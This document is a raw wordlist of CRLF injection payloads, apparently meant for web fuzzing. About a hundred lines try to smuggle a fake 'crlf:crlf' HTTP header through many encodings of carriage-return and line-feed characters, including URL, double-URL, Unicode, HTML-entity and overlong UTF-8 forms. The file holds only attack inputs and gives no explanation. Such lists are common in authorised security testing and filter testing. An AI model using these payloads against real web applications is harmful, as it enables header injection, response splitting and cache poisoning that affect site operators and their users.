$0Dcrlf:crlf
%%0A0Acrlf:crlf
%00%00%FE%FF%00%00%00%0Acrlf:crlf
%00%00%FE%FF%00%00%00%0Dcrlf:crlf
%00%00%FE%FF%00%00%00%0D%00%00%FE%FF%00%00%00%0Acrlf:crlf
%0Acrlf:crlf
%0A%20crlf:crlf
%0Dcrlf:crlf
%0D%0Acrlf:crlf
%0D%0A%09crlf:crlf
%0D%0A%20crlf:crlf
%0D%20crlf:crlf
%20%0Acrlf:crlf
%20%0Dcrlf:crlf
%20%0D%0Acrlf:crlf
%23%0Acrlf:crlf
%23%0Dcrlf:crlf
%23%0D%0Acrlf:crlf
%23%0acrlf:crlf
%23%0dcrlf:crlf
%23%0d%23%0acrlf:crlf
%23%OAcrlf:crlf
%25%30%61crlf:crlf
%25%30Acrlf:crlf
%250Acrlf:crlf
%250Dcrlf:crlf
%250D%250Acrlf:crlf
%25250Acrlf:crlf
%25250Dcrlf:crlf
%25250D%25250Acrlf:crlf
%2F..%0acrlf:crlf
%2F..%0dcrlf:crlf
%2F..%0d%0acrlf:crlf
%3F%0Acrlf:crlf
%3F%0Dcrlf:crlf
%3F%0D%0Acrlf:crlf
%3f%0acrlf:crlf
%3f%0dcrlf:crlf
%3f%0d%3f%0acrlf:crlf
%5cr%5cncrlf:crlf
%E5%98%8A%E5%98%8Dcrlf:crlf
%E5%98%8A%E5%98%8D%0Acrlf:crlf
%E5%98%8A%E5%98%8D%0Dcrlf:crlf
%E5%98%8A%E5%98%8D%0D%0Acrlf:crlf
%EF%BD%0Acrlf:crlf
%EF%BD%0Dcrlf:crlf
%EF%BD%0D%EF%BD%0Acrlf:crlf
%FE%FF%00%0Acrlf:crlf
%FE%FF%00%0Dcrlf:crlf
%FE%FF%00%0D%FE%FF%00%0Acrlf:crlf
%u000Acrlf:crlf
&#10;crlf:crlf
&#13;crlf:crlf
&#13;&#10;crlf:crlf
&NewLine;crlf:crlf
&carriage;crlf:crlf
&carriage;&NewLine;crlf:crlf
/%%0a0acrlf:crlf
/%%0d0dcrlf:crlf
/%%0d0d/%%0a0acrlf:crlf
/%23%0acrlf:crlf
/%23%0dcrlf:crlf
/%23%0d/%23%0acrlf:crlf
/%25%30%61crlf:crlf
/%25%30%64crlf:crlf
/%25%30%64/%25%30%61crlf:crlf
/%25%30acrlf:crlf
/%25%30dcrlf:crlf
/%25%30d/%25%30acrlf:crlf
/%250acrlf:crlf
/%250dcrlf:crlf
/%250d/%250acrlf:crlf
/%25250acrlf:crlf
/%25250dcrlf:crlf
/%25250d/%25250acrlf:crlf
/%3f%0acrlf:crlf
/%3f%0dcrlf:crlf
/%3f%0d/%3f%0acrlf:crlf
/%u000acrlf:crlf
/%u000dcrlf:crlf
/%u000d/%u000acrlf:crlf
/ncrlf:crlf
/rcrlf:crlf
/r/ncrlf:crlf
\12crlf:crlf
\15crlf:crlf
\15\12crlf:crlf
\\ncrlf:crlf
\\rcrlf:crlf
\\r\\ncrlf:crlf
\ncrlf:crlf
\rcrlf:crlf
\r\ncrlf:crlf
\r\n crlf:crlf
\u000Acrlf:crlf
\u000Dcrlf:crlf
\u000D\u000Acrlf:crlf
\u560dcrlf:crlf
\u560acrlf:crlf
\u560d\u560acrlf:crlf

